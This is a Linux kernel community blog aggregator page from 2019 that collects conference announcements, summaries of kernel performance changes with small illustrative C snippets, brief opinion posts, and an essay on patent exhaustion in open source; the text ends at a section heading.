Kernel Planet

May 22, 2019

Linux Plumbers Conference: Additional early bird slots available for LPC 2019

The Linux Plumbers Conference (LPC) registration web site has been showing “sold out” recently because the cap on early bird registrations
was reached. We are happy to report that we have reviewed the registration numbers for this year’s conference and were able to open more early bird registration slots. Beyond that, regular registration will open July 1st. Please note that speakers and microconference runners get free passes to LPC, as do some microconference presenters, so that may be another way to attend the conference. Time is running out for new refereed-track and microconference proposals, so visit the CFP page soon. Topics for accepted microconferences are welcome as well.

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 22, 2019 01:03 PM

May 20, 2019

James Morris: Linux Security Summit 2019 North America: CFP / OSS Early Bird Registration

The LSS North America 2019 CFP is currently open, and you have until May 31st to submit your proposal. (That’s the end of next week!)

If you’re planning on attending LSS NA in San Diego, note that the Early Bird registration for Open Source Summit (which we’re co-located with) ends today.

You can of course just register for LSS on its own, here.

May 20, 2019 08:56 PM

Linux Plumbers Conference: Tracing Microconference Accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the Tracing Microconference has been accepted into the 2019 Linux Plumbers Conference! Its return to Linux Plumbers shows that tracing is not finished in Linux, and there continue to be challenging problems to solve.

There is a broad range of ways to perform tracing in Linux: from the original mainline Linux tracer, Ftrace, to profiling tools like perf, more complex customized tracing like BPF, and out-of-tree tracers like LTTng, SystemTap, and DTrace. Part of the trouble with tracing within Linux is that there is so much to choose from. Each of these has its own audience, but there is a lot of overlap. This year’s theme is to find those common areas and combine them into common utilities.

There is also a lot of new work happening, and discussions between top maintainers will help keep everyone in sync and provide good direction for the future.

Expected topics include:

Come and join us and not only learn but help direct the future progress of tracing inside the Linux kernel and beyond!

If you have another tracing topic idea, please send it to Steven Rostedt: rostedt@goodmis.org .

We hope to see you there!

May 20, 2019 05:37 PM

Pete Zaitcev: Google Fi

Seen an amusing blog post today on the topic of the hideous debacle that is Google Fi (on top of being a virtual network). Here's the best part though:

About a year ago I tried to get my parents to switch from AT&T to Google Fi. I even made a spreadsheet for my dad (who likes those sorts of things) about how much money he could save. He wasn’t interested. His one point was that at anytime he can go in and get help from an AT&T rep. I kept asking “Who cares? Why would you ever need that?”. Now I know. He was paying almost $60 a month premium for the opportunity to be able to talk to a real person, face-to-face! I would gladly pay that now.

Respect your elders!

May 20, 2019 03:39 PM

Ted Tso: Switching to Hugo

With the demise of Google+, I’ve decided to try to resurrect my blog. Previously, I was using Wordpress, but I’ve decided that it’s just too risky from a security perspective. So I’ve moved my blog over to Hugo.

A consequence of this switch is that all of the Wordpress comments have been dropped, at least for now.

May 20, 2019 03:19 AM

May 14, 2019

Dave Airlie (blogspot): Senior Job in Red Hat graphics team

We have a job in our team; it’s a pretty senior role, and we definitely want people with lots of experience. Great place to work, ignore any possible future mergers :-)

https://global-redhat.icims.com/jobs/68911/principal-software-engineer/job?mobile=false&width=1526&height=500&bga=true&needsRedirect=false&jan1offset=600&jun1offset=600

May 14, 2019 09:07 PM

May 10, 2019

Linux Plumbers Conference: RISC-V microconference accepted for the 2019 Linux Plumbers Conference

The open nature of the RISC-V ecosystem has allowed contributions from both academia and industry, leading to an unprecedented number of new hardware design proposals in a very short time span. Linux support is the key to enabling these new hardware options. Since last year’s Plumbers, many kernel features have been added to RISC-V. To name a few, we now have out-of-the-box 32-bit and eBPF support, some key issues with the Linux boot process have been addressed, and hypervisor support is on its way.

Last year’s RISC-V microconference was such a success that we would like to repeat that again this year by focusing on finding solutions and discussing ideas that require kernel changes.

Topics for this year’s microconference are expected to cover:

If you’re interested in participating in this microconference or have other topics to propose, please contact Atish Patra (atish.patra@wdc.com) or Palmer Dabbelt (palmer@dabbelt.com).

LPC will be held in Lisbon, Portugal from Monday, September 9 through Wednesday, September 11.

We hope to see you there!

May 10, 2019 07:55 PM

May 09, 2019

Davidlohr Bueso: Linux v5.1: Performance Goodies

sched/wake_q: reduce atomic operations for special users

Some core users of wake_qs, futexes and rwsems, were incurring double task reference counting, a side effect kept for safety reasons. This change levels the call’s performance with that of the rest of the users.
[Commit 07879c6a3740]

irq: Speedup for interrupt statistics in /proc/stat

On large systems with a large number of interrupts, the readout of /proc/stat takes a long time to sum up the interrupt statistics. The reason for this is that interrupt statistics are accounted per cpu, so the /proc/stat logic has to sum the per-cpu stats for each interrupt. While applications shouldn’t really be doing this to the point where it creates bottlenecks, the fix was fairly easy.
[Commit 1136b0728969]
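
As a rough illustration (my own sketch, not code from the patch), this is the sort of readout involved; every number on the intr line of /proc/stat is itself a sum of per-cpu counters that the kernel computes on every read:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative sketch: parse the "intr" line of /proc/stat. Producing
 * each of these numbers used to require the kernel to sum per-cpu
 * counters for every single interrupt. */
int main(void)
{
    char line[65536]; /* the intr line grows with the number of interrupts */
    FILE *f = fopen("/proc/stat", "r");
    if (!f) {
        perror("fopen");
        return 1;
    }
    while (fgets(line, sizeof(line), f)) {
        if (strncmp(line, "intr ", 5) == 0) {
            /* the first field is the total; per-interrupt counts follow */
            unsigned long long total = strtoull(line + 5, NULL, 10);
            printf("total interrupts serviced: %llu\n", total);
            break;
        }
    }
    fclose(f);
    return 0;
}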

mm/swapoff: replace quadratic complexity with linear

try_to_unuse() is of quadratic complexity, with a lot of wasted effort. It unuses swap entries one by one, potentially iterating over all the page tables for all the processes in the system for each one. With these changes, it now iterates over the system's mms once, unusing all the affected entries as it walks each set of page tables.

Benchmarks show the time for swapoff on a swap partition containing about 6G of data dropping from 8 minutes to 3.
[Commit c5bf121e4350 b56a2d8af914]

mm: make pinned_vm an atomic counter

This reduces some of the bulky mmap_sem games played when dealing with the pinned pages counter, mostly by rdma. It also stops relying on the lock for get_user_pages operations.
[Commit 70f8a3ca68d3 3a2a1e90564e b95df5e3e459]

drivers/async: NUMA aware async_schedule calls

Asynchronous function calls reduce, primarily, kernel boot time by safely doing out-of-order operations such as device discovery. This series improves NUMA locality by scheduling device-specific init work on specific NUMA nodes, in order to improve the performance of memory initialization. Significant reductions in init times for persistent memory were seen.
[Commit 3451a495ef24 ed88747c6c4a ef0ff68351be 8204e0c1113d 6be9238e5cb6 c37e20eaf4b2 8b9ec6b73277 af87b9a7863c 57ea974fb871]

lib/iov_iter: optimize page_copy_sane()

This avoids cacheline misses when dereferencing a struct page via compound_head(), when possible. Apparently the overhead was visible in TCP recvmsg() calls dealing with GRO packets.
[Commit 6daef95b8c91]

fs/epoll: reduce lock contention in ep_poll_callback()

This patch increases the bandwidth of events which can be delivered from sources to the poller by adding poll items to the ready list in a lockless way, via clever use of xchg() while holding a reader rwlock. This improves scenarios with multiple threads generating IO events which are delivered to a single-threaded epoll_wait()er.
[Commit c141175d011f c3e320b61581 a218cc491420]
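
To illustrate the idea, here is a simplified userspace sketch of a lockless ready-list push; the kernel’s actual code relies on xchg() tricks, whereas this sketch uses the plain compare-and-swap variant:

#include <stdatomic.h>
#include <stddef.h>

/* Simplified sketch of a lockless ready-list push. The kernel patch uses
 * xchg()-based tricks; this is the compare-and-swap variant. */
struct epitem {
    struct epitem *next;
    int fd; /* illustrative payload */
};

static _Atomic(struct epitem *) ready_head;

/* Many producers may call this concurrently without taking a list lock. */
static void push_ready(struct epitem *item)
{
    struct epitem *old = atomic_load(&ready_head);
    do {
        item->next = old;
    } while (!atomic_compare_exchange_weak(&ready_head, &old, item));
}

int main(void)
{
    struct epitem a = { .next = NULL, .fd = 1 };
    struct epitem b = { .next = NULL, .fd = 2 };
    push_ready(&a);
    push_ready(&b);
    return 0;
}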

fs/nfs: reduce cost of listing huge directories (readdirplus)

When listing very large directories via NFS, clients may take a long time to complete. Most of the cost comes from libc’s readdir(3) requesting 32k of directory entries at a time. To improve performance and reduce the number of rpc calls, the NFS readdirplus rpc now asks for larger amounts of data (more than 32k); the data can fill more than one page, and the cached pages can be used for the next readdir call. Benchmarks show rpc calls decreasing by 85% while listing a directory with 300k files.
[Commit be4c2d4723a4]

fs/pnfs: Avoid read/modify/write when it is not necessary

When testing with fio, throughput of overwrites (both buffered and O_SYNC) is noticeably improved.
[Commit 97ae91bbf3a7 2cde04e90d5b]

May 09, 2019 08:10 PM

Davidlohr Bueso: Linux v5.0: Performance Goodies

mm/page-alloc: reduce zone->lock contention

Contention on the page allocator’s zone->lock was seen in a network traffic report, in which order-0 allocations were being freed directly back to the buddy allocator instead of making use of the per-cpu pages in the page_frag_free() call. Aside from eliminating the contention, the change was seen to improve some microbenchmarks.
[Commit 65895b67ad27]

mm/mremap: improve scalability on large regions

When THP is disabled, move_page_tables() can bottleneck a large mremap() call, as it copies one pte at a time. This patch speeds up the operation by copying at the PMD level when possible. Up to 20x speedups were seen when doing a 1Gb remap.
[Commit 2c91bd4a4e2e]
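
For context, a sketch (mine, not from the patch) of the kind of call that ends up in move_page_tables():

#define _GNU_SOURCE
#include <sys/mman.h>
#include <stdio.h>
#include <string.h>

/* Illustration: grow a large mapping with mremap(). If it cannot be
 * expanded in place the kernel moves it, which is where
 * move_page_tables() used to copy one pte at a time. */
int main(void)
{
    size_t sz = 1UL << 30; /* 1 GiB */
    void *p = mmap(NULL, sz, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) { perror("mmap"); return 1; }
    memset(p, 1, sz); /* populate page tables so there is something to move */
    void *q = mremap(p, sz, 2 * sz, MREMAP_MAYMOVE);
    if (q == MAP_FAILED) { perror("mremap"); return 1; }
    munmap(q, 2 * sz);
    return 0;
}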

mm: improve anti-fragmentation

Given sufficient time or an adverse workload, memory gets fragmented and the long-term success of high-order allocations degrades. Overall the series reduces external-fragmentation-causing events by over 94% on 1 and 2 socket machines, which in turn improves high-order allocation success rates over the long term.
[Commit 6bb154504f8b a921444382b4 0a79cdad5eb2 1c30844d2dfe]

mm/hotplug: optimize clear_hwpoisoned_pages()

During hotplug remove, the kernel loops over the respective number of pages looking for poisoned pages. A check against the atomic count of poisoned pages was added, so the scan can be skipped entirely when there are none.
[Commit 5eb570a8d924]

mm/ksm: Replace jhash2 with xxhash

xxhash is an extremely fast non-cryptographic hash algorithm for checksumming, making it suitable to use in kernel samepage merging. On a custom KSM benchmark, throughput was seen to improve from 1569 to 8770 MB/s.
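
To give a feel for the interface, a userspace sketch using the xxHash library’s XXH64() call (KSM itself uses the kernel’s internal copy of xxhash):

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <xxhash.h> /* userspace xxHash library; build with -lxxhash */

/* Sketch of the per-page checksumming KSM now performs: one fast
 * non-cryptographic hash over a page-sized buffer. */
int main(void)
{
    unsigned char page[4096];
    memset(page, 0x5a, sizeof(page));
    uint64_t h = XXH64(page, sizeof(page), 0 /* seed */);
    printf("page checksum: %016llx\n", (unsigned long long)h);
    return 0;
}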

genirq/affinity: Spread IRQs to all available NUMA nodes

If the number of NUMA nodes exceeds the number of MSI/MSI-X interrupts which are allocated for a device, the interrupt affinity spreading code fails to spread them across all nodes. NUMA nodes above the number of interrupts are all assigned to hardware queue 0 and therefore NUMA node 0, which results in bad performance and has CPU hotplug implications. Fix this by assigning via round-robin.
[Commit b82592199032]

fs/epoll: Optimizations for epoll_wait()

Various performance changes oriented towards improving the waiting side, such that contention on the epoll waitqueue spinlock (previously ep->lock) is reduced. This produces pretty good results for various concurrent epoll_wait(2) benchmarks.
[Commit 74bdc129850c 4e0982a00564 76699a67f304 21877e1a5b52 c5a282e9635e abc610e01c66 86c051793b4c]

lib/sbitmap: Various optimizations

Two optimizations to the sbitmap core were introduced, which is used, for example, by the block-mq tags. The first optimizes wakeup checks and adds to the core api, while the second introduces batched clearing of bits, trading 64 atomic bitops for 2 cmpxchg calls.
[Commit 5d2ee7122c73 ea86ea2cdced]

fs/locks: Avoid thundering herd wakeups

When one thread releases a lock on a given file, it wakes up all other threads that are waiting (classic thundering herd): one will get the lock and the others go back to sleep. The overhead starts being noticeable with increasing thread counts. These changes create a tree of pending lock requests in which siblings don’t conflict and each lock request does conflict with its parent. When a lock is released, only requests which don’t conflict with each other are woken.

Testing shows that lock acquisitions per second are now fairly stable even as the number of contending processes grows to 1000. Without this patch, locks-per-second drops off steeply after a few tens of processes. Micro-benchmarks can be found in the lockscale program, which tests fcntl(..., F_OFD_SETLKW, ...) and flock(..., LOCK_EX) calls.
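
For reference, this is roughly the contended pattern such a benchmark exercises; a sketch of the flock() case, my illustration rather than the lockscale source:

#include <fcntl.h>
#include <sys/file.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sketch of the contended pattern: N processes taking turns on one
 * file lock. Before the patch, every unlock woke all waiters. */
int main(void)
{
    const int nproc = 100, iters = 1000;
    for (int i = 0; i < nproc; i++) {
        if (fork() == 0) {
            /* each child opens its own file description, so the
               flock() calls actually contend with each other */
            int fd = open("/tmp/lockfile", O_CREAT | O_RDWR, 0600);
            if (fd < 0)
                _exit(1);
            for (int j = 0; j < iters; j++) {
                flock(fd, LOCK_EX);
                flock(fd, LOCK_UN);
            }
            _exit(0);
        }
    }
    while (wait(NULL) > 0)
        ;
    return 0;
}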

arm64/lib: improve crc32 performance for deep pipelines

This change replaces most branches with a branchless code path that overlaps 16 byte loads to process the first (length % 32) bytes, and processes the remainder using a loop that handles 32 bytes at a time.
[Commit efdb25efc764]

May 09, 2019 08:10 PM

Michael Kerrisk (manpages): man-pages-5.01 is released

I've released man-pages-5.01. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from just over 20 contributors. The release is smaller than typical; it includes just over 70 commits that changed just over 40 pages.

The most notable of the changes in man-pages-5.01 is the following:


May 09, 2019 12:10 PM

May 04, 2019

Pete Zaitcev: YAML

Seen in a blog entry by Martin Tournoij (via):

I’ve been happily programming Python for over a decade, so I’m used to significant whitespace, but sometimes I’m still struggling with YAML. In Python the drawbacks and loss of clarity are contained by not having functions that are several pages long, but data or configuration files have no such natural limits to their length.

[...]

YAML may seem ‘simple’ and ‘obvious’ when glancing at a basic example, but turns out it’s not. The YAML spec is 23,449 words; for comparison, TOML is 3,339 words, JSON is 1,969 words, and XML is 20,603 words.

There's more where the above came from. In particular, the portability issues are rather surprising.

Unfortunately for me, OpenStack TripleO is based on YAML.

May 04, 2019 06:48 PM

Linux Plumbers Conference: BPF microconference accepted into 2019 Linux Plumbers Conference

We are pleased to announce that the BPF microconference has been accepted into the 2019 Linux Plumbers Conference! Last year’s BPF microconference was such a success that it will be held again this year.

BPF along with its just-in-time (JIT) compiler inside the Linux kernel allows for versatile programmability of the kernel and plays a major role in networking (XDP, tc BPF, etc.), tracing (kprobes, uprobes, tracepoints) and security (seccomp, landlock) subsystems.

Since last year’s Plumbers Conference, many of the discussed improvements have been tackled and found their way into the Linux kernel such as significant steps towards allowing for a compile-once paradigm with the help of BTF and global data support as well as considerable verifier scalability improvements to name a few. The topics proposed for this year’s event include:

– libbpf, loader unification
– Standardized BPF ELF format
– Multi-object semantics and linker-style logic for BPF loaders
– Verifier scalability work towards 1 million instructions
– Sleepable BPF programs
– BPF loop support
– Indirect calls in BPF
– Unprivileged BPF
– BPF type format (BTF)
– BPF timers
– bpftool
– LLVM BPF backend, JITs and BPF offloading
– and more

Come join us and participate in the decision making of one of the most cutting edge advancements in the Linux kernel!

See here for a detailed preview of the proposed and accepted topics. Please feel free to submit your discussion proposals to Alexei or Daniel: lpc-bpf@vger.kernel.org

We hope to see you there!

May 04, 2019 01:31 AM

May 02, 2019

Pete Zaitcev: Fraud in the material world

Wow, they better not be building Boeings from this crap:

NASA Launch Services Program (LSP) investigators have determined the technical root cause for the Taurus XL launch failures of NASA’s Orbiting Carbon Observatory (OCO) and Glory missions in 2009 and 2011, respectively: faulty materials provided by aluminum manufacturer, Sapa Profiles (SPI). LSP’s technical investigation led to the involvement of NASA’s Office of the Inspector General and the U.S. Department of Justice (DOJ). DOJ’s efforts, recently made public, resulted in the resolution of criminal charges and alleged civil claims against SPI, and its agreement to pay $46 million to the U.S. government and other commercial customers. This relates to a 19-year scheme that included falsifying thousands of certifications for aluminum extrusions to hundreds of customers.

BTW, those costly failures probably hastened the sale of Orbital to ATK in 2015. There were repercussions for the personnel running the Taurus program as well.

May 02, 2019 05:52 PM

Daniel Vetter: Upstream First

lwn.net just featured an article on the sustainability of open source, which seems to have been a bit of a topic in various places for a while. I gave a keynote at the Siemens Linux Community Event 2018 last year which lends itself to a different take on all this:

The slides for those who don’t like videos.

This talk was mostly aimed at managers of engineering teams and projects with fairly little experience in shipping open source, and much less experience in shipping open source through upstream cross vendor projects like the kernel. It goes through all the usual failings and missteps and explains why an upstream first strategy is the right one, but with a twist: instead of technical reasons, it’s all based on economic considerations of why open source is succeeding. Fundamentally it’s not about the better software, or the cheaper price, or that the software freedoms are a good thing worth supporting.

Instead, open source is eating the world because it enables a much more competitive software market, and all the best practices around open development are there just to enable that highly competitive market. Instead of arguing that open source has open development and strongly favours public discussions because that results in better collaboration and better software, we put on the economic lens, and private discussions become insider trading and collusion. And that’s just not considered cool in a competitive market. Similar arguments can be made for everything else going on in open source projects.

Circling back to the list of articles at the top, I think it’s worth looking at the sustainability of open source as an economic issue of an extremely competitive market, in other words, as a market failure: occasionally the result is that no one gets paid and the customers only receive a sub-par product with all costs externalized, costs like keeping up with security issues. And as with other market failures, a solution needs to be externally imposed through regulations, taxation and transfers to internalize all the costs again into the product’s price. Frankly, I have no idea what that would look like in practice though.

Anyway, just a thought, but good enough a reason to finally publish the recording and slides of my talk, which covers this just in passing in an offhand remark.

Update: Fix slides link.

May 02, 2019 12:00 AM

April 24, 2019

Linux Plumbers Conference: Lots of microconferences proposed for LPC

Microconference proposals have been rolling in for the 2019 Linux Plumbers Conference, but it is not too late to submit more. So far, we have the following microconference proposals:

If you have suggestions for topics to be discussed in those microconferences, please email contact@linuxplumbersconf.org to connect with the microconference runners.

Other microconference topic areas are still welcome, please go to the CFP page to submit yours today!

April 24, 2019 01:36 PM

April 13, 2019

Linux Plumbers Conference: Registration is open for the 2019 Linux Plumbers Conference

Registration is now open for the 2019 edition of the Linux Plumbers Conference (LPC). It will be held September 9-11 in Lisbon, Portugal with dedicated Linux Kernel Summit and Networking tracks, as was done last year, along with the microconferences and refereed presentations that are LPC standards. Go to the registration site to sign up or the attend page for more information on dates and quotas for the various registration types. Early registration will run until June 30 or until the quota is filled.

Note that the CFPs for microconferences, refereed track talks, and BoFs are still open, please see this page for more information.

As always, please contact the organizing committee if you have questions.

April 13, 2019 09:23 AM

April 12, 2019

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Bird of a Feather (BoF) Session Proposals

On the heels of the previous announcements, we are also pleased to announce the Bird of a Feather (BoF) Session Proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

BoFs are free-form get-togethers for people wishing to discuss a particular topic. As always, you only need to submit proposals for BoFs you want to hold on-site. In contrast, and again as always, informal BoFs may be held at local drinking establishments or in the “hallway track” at your convenience.

For more information on submitting a BoF session proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The calls for Microconferences and Refereed-Track proposals are also open, and we hope to see you in Lisbon this coming September!

April 12, 2019 08:05 AM

April 10, 2019

Paul E. Mc Kenney: Confessions of a Recovering Proprietary Programmer, Part XVI

I build quite a few Linux kernels, mostly in support of my deep and abiding rcutorture habit. These builds can take some time, even on modern laptops, but they are nevertheless amazingly fast compared to the build times of the much smaller projects I worked on in decades past. Additionally, build times are way down in the noise when I am doing multi-hour rcutorture runs. So much so that I don't bother with cut-down kernel configurations, especially given that cut-down configurations are an excellent way to fail to spot subtle RCU API problems.

Still, faster builds do have their advantages, especially when doing a series of short tests, such as when chasing down that rarest of creatures, an RCU bug that reproduces reliably within a few minutes of boot. Which is exactly what I was doing yesterday. And during that time, a five-minute kernel build time was much more annoying than it normally would be.

But that is why we have ccache, a tool that is considerably more attractive than it was back when my laptop's mass storage weighed in at “only” a few tens of gigabytes. With a bit of help from here, here, and the ccache man page, I got ccache up and running, and somewhat later got it actually making kernel builds go faster. Sometimes considerably more than an order of magnitude faster!

But I do get spoiled really quickly.

You see, the first ccache build goes no faster than a normal build because the cache is initially empty. And yes, a five, six, or even seven-minute build was just fine a couple of days ago: After all, there is always some small task that needs to be done. But having just witnessed builds completing in way less than one minute, even a five-minute wait now seemed horribly slow. And a five-minute build is what I get the first time I run a given rcutorture scenario. Or after I modify an rcutorture scenario. Or if I specify unusual arguments to rcutorture's --kconfig command-line option. Or if I modify a heavily used include file. Or when I configured ccache's cache size too small.

Nevertheless, I most definitely should have installed ccache a very long time ago! :-)

April 10, 2019 09:37 PM

April 08, 2019

Linux Plumbers Conference: Results from the 2018 LPC survey

Thank you to everyone who participated in the survey after Linux Plumbers in 2018. We had 134 responses, which, given the total number of conference participants of around 492, has provided confidence in the feedback.

Overall: 85% of respondents were positive about the event, with only 2% actually saying they were dissatisfied. Co-locating with Kernel Summit proved popular, so we will be co-locating with Kernel Summit in 2019. Co-locating with Networking Summit was also well received, so we will be doing that again this year, too. Conference participation was up from 2017 and we sold out again this year. 98% of those that registered were able to attend.

Based on feedback from last year’s survey, we videotaped all of the sessions, and the videos are now posted. There are over 100 hours of video in our YouTube channel or you can access them by visiting the detailed schedule and clicking on the video link in the presentation materials section of any given talk or discussion. The Microconferences are recorded as one long video block, but clicking on the video link of a particular discussion topic will take you to the time index in that file where the chosen discussion begins.

Venue: 67% of survey respondents considered the number of attendees to be just right, however 25% would have liked to see more people able to attend. In general, 43% of respondents considered the venue size to be a good match, but a significant portion (45%) would have preferred it to be bigger. The room size was considered effective for participation by 95% of the respondents, however there was a clear indication in the comments that we need to figure out a better way to allocate rooms based on expected participants, as some ended up overflowing. There is some desire for additional electrical outlets to be made available, which will be looked into for the 2019 event.

Content: In terms of track feedback, Linux Plumbers Refereed track and Kernel Summit track were indicated as very relevant by almost all respondents who attended. The Networking track had fewer participants responding on the survey, but was positively reviewed as well. Hallway track continues to be regarded as very relevant, and appreciated.

Communication: This year we had a new website, and participants were able to navigate through it and find the sessions they needed. In the feedback, there were some requests to integrate scheduling app capabilities (and attendee room sizes); the committee will look into options for that.

Events: Craft Beer was the most popular event and had favorable feedback from respondents. There were some concerns expressed in the written feedback that we didn’t clarify there were non-alcoholic options available there, and we’ll take note to communicate this better in future. The final closing event venue was originally planned for conference attendance similar to the prior year; the 20% increase to 492 attendees impacted this event, and the perception from the comments was that it was too crowded and had insufficient food.

There were lots of great suggestions to the “what one thing would you like to see changed” question, and the program committee has been studying them to see what is possible to implement this year. Thank you again to the participants for their input and help on making the Linux Plumbers Conference better in 2019 and the future.

April 08, 2019 03:30 PM

March 30, 2019

James Bottomley: A Roadmap for Eliminating Patents in Open Source

The realm of Software Patents is often considered to be a fairly new field which isn’t really influenced by anything else that goes on in the legal landscape. In particular there’s a very old field of patent law called exhaustion which had, up until a few years ago, never been applied to software patents. This lack of application means that exhaustion is rarely raised as a defence against infringement and thus it is regarded as an untested strategy. Van Lindberg recently did a FOSDEM presentation containing interesting ideas about how exhaustion might apply to software patents in the light of recent court decisions. The intriguing possibility this offers us is that we may be close to an enforceable court decision (at least in the US) that would render all patents in open source owned by community members exhausted and thus unenforceable. The purpose of this blog post is to explain the current landscape and how we might be able to get the necessary missing court decisions to make this hope a reality.

What is Patent Exhaustion?

Patent law is ancient, going back to Greece in around 500BC. However, every legal system has been concerned that patent holders, being an effective monopoly with the legal right to exclude others, did not abuse that monopoly position. This led to the concept that if you used your monopoly power to profit, you should only be able to do it once for the same item so that absolute property rights couldn’t be clouded by patents. This leads to something called the exhaustion doctrine: so if Alice holds a patent on some item which she sells to Bob and Bob later sells the same item to Charlie, Alice can’t force Bob or Charlie to give her a part of their sale proceeds in exchange for her allowing Charlie to practise the patent on the item. The patent rights are said to be exhausted with the sale from Alice to Bob, so there are no patent rights left to enforce on Charlie. The exhaustion doctrine has since been expanded to any authorized transfer, even if no money changes hands (so if Alice simply gave Bob the item instead of selling it, the patent still exhausts at that transaction and Bob is still free to give or sell the item to Charlie without interference from Alice).

Of course, modern US patent rights have been around now for two centuries and in that time manufacturers have tried many ingenious schemes to get around the exhaustion doctrine profitably, all of which have so far failed in the courts, leading to quite a wealth of case law on the subject. The most interesting recent example (Lexmark v Impression) was over whether a patent holder could use their patent power to enforce any onward conditions at all, for which the US Supreme Court came to the conclusive finding: they can’t, going on to say that all patent rights in the item terminate at the first authorized transfer. That doesn’t mean no post-sale conditions can be imposed; they can be, by contract or licence or other means, it just means post-sale conditions can’t be enforced by patent actions. This is the bind for Lexmark: their sales contracts did specify that empty cartridges couldn’t be resold, so their customers violated that contract by selling the cartridges to Impression to refill and resell. However, that contract was between Lexmark and the customer, not Lexmark and Impression, so absent patent remedies Lexmark has no contractual case against Impression, only against its own customers.

Can Exhaustion apply if Software isn’t actually sold?

The exhaustion doctrine actually has an almost identical equivalent for copyright called the First Sale doctrine. Back when software was being commercialized, no software distributor liked the idea that copyright in software exhausts after it is sold, so the idea of licensing instead of selling software was born, which is why you always get that end user licence agreement for software you think you bought. However, this makes all software (including open source) very tricky territory for patent exhaustion because there’s no first sale to exhaust the rights.

The idea that Exhaustion didn’t have to involve an exchange of something (so became authorized transfer instead of first sale) in US law is comparatively recent, dating to a 2013 decision LifeScan v Shasta where one point won on appeal was that giving away devices did exhaust the patent. The idea that authorized transfer could extend to software downloads really dates to Cascades v Samsung in 2014.

The bottom line is that exhaustion does apply to software and downloading is an authorized transfer within the meaning of the Exhaustion Doctrine.

The Implications of Lexmark v Impression for Open Source

The precedent for Open Source is quite clear: Patents cannot be used to impose onward conditions that the copyright licence doesn’t. For instance the Open Air Interface 5G alliance public licence attempts just such a restriction in clause 3 “Grant of Patent License” where it tries to restrict the grant to being only if you use the source for “study and research” otherwise you need an additional patent licence from OAI. Lexmark v Impression makes that clause invalid in the licence: once you obtain open source under the OAI licence, the OAI patents exhaust at that point and there are no onward patent rights left to enforce. This means that source distributed under OAI can be reused under the terms of the copyright licence (which is permissive) without any fear of patent restrictions. Now OAI can still amend its copyright licence to impose the field of use restrictions and enforce them via copyright means, it just can’t use patents to do so.

FRAND and Open Source

There have recently been several attempts to claim that FRAND patent enforcement and Open Source licensing can be compatible, or more specifically a FRAND patent pool holder like a Standards Development Organization can both produce an Open Source reference implementation and still collect patent Royalties. This looks to be wrong, however; the Supreme Court decision is clear: once a FRAND Patent pool holder distributes any code, that distribution is an authorized transfer within the meaning of the first sale doctrine and all FRAND pool patents exhaust at that point. The only way to enforce the FRAND royalty payments after this would be in the copyright licence of the code and obviously such a copyright licence, while legal, would not be remotely an Open Source licence.

Exhausting Patents By Distribution

The next question to address is could patents become exhausted simply because the holder distributed Open Source code in any form? As I said before, there is actually a case on point for this as well: Cascades v Samsung. In this case, Cascades tried to sue Samsung for violating a patent on the Dalvik JIT engine in AOSP. Cascades claimed they had licensed the patent to Google for a payment only for use in Google products. Samsung claimed exhaustion because Cascades had licensed the patent to Google and Samsung downloaded AOSP from Google. The court agreed with this and dismissed the infringement action. Case closed, right? Not so fast: it turns out Cascades raised a rather silly defence to Samsung’s claim of exhaustion, namely that the authorized transfer under the exhaustion doctrine didn’t happen until Samsung did the download from Google, so they were still entitled to enforce the Google products only restriction. As I said in the beginning courts have centuries of history with manufacturers trying to get around the exhaustion doctrine and this one crashed and burned just like all the others. However, the question remains: if Cascades had raised a better defence to the exhaustion claim, would they have prevailed?

The defence Cascades could have raised is that Samsung didn’t just download code from Google, they also copied the code they downloaded and those copies should be covered under the patent right to exclude manufacture, which didn’t exhaust with the download. To illustrate this in the Alice, Bob, Charlie chain: Alice sells an item to Bob and thus exhausts the patent so Bob can sell it on to Charlie unencumbered. However that exhaustion does not give either Bob or Charlie the right to manufacture a new copy of the item and sell it to Denise because exhaustion only applies to the same item Alice sold, not to a newly manufactured copy of that item.

The copy as new manufacture defence still seems rather vulnerable on two grounds: first because Samsung could download any number of exhausted copies from Google, so what’s the difference between them downloading ten copies and them downloading one copy and then copying it themselves nine times? Secondly, and more importantly, Cascades already had a remedy in copyright law: their patent licence to Google could have required that the AOSP copyright licence be amended not to allow copying of the source code by non-Google entities except on payment of royalties to Cascades. The fact that Cascades did not avail themselves of this remedy at the time means they’re barred from reclaiming it now via patent action.

The bottom line is that “distribution exhausts all patents reading on the code you distribute” is a very reasonable defence to maintain in a patent infringement lawsuit, and it’s one we should be using much more often.

Exhaustion by Contribution

This is much more controversial and currently has no supporting case law. The idea is that Distribution can occur even with only incremental updates on the existing base (git pull to update code, say), so if delta updates constitute an authorized transfer under the exhaustion doctrine, then so must a patch based contribution, being a delta update from a contributor to the project, be an authorized transfer. In which case all patents which read on the project at the time of contribution must also exhaust when the contribution is made.

Even if the above doesn’t fly, it’s undeniable most contributions today are made by cloning a git tree and republishing it plus your own updates (essentially a github fork) which makes you a bona fide distributor of the whole project because it can all be downloaded from your cloned tree. Thus I think it’s reasonable to hold that all patents owned by distributors and contributors in an open source project have exhausted in that project. In other words all the arguments about the scope and extent of patent grants and patent capture in open source licences is entirely unnecessary.

Therefore, all active participants in an Open Source community ipso facto exhaust any patents on the community code as that code is redistributed.

Implications for Proprietary Software

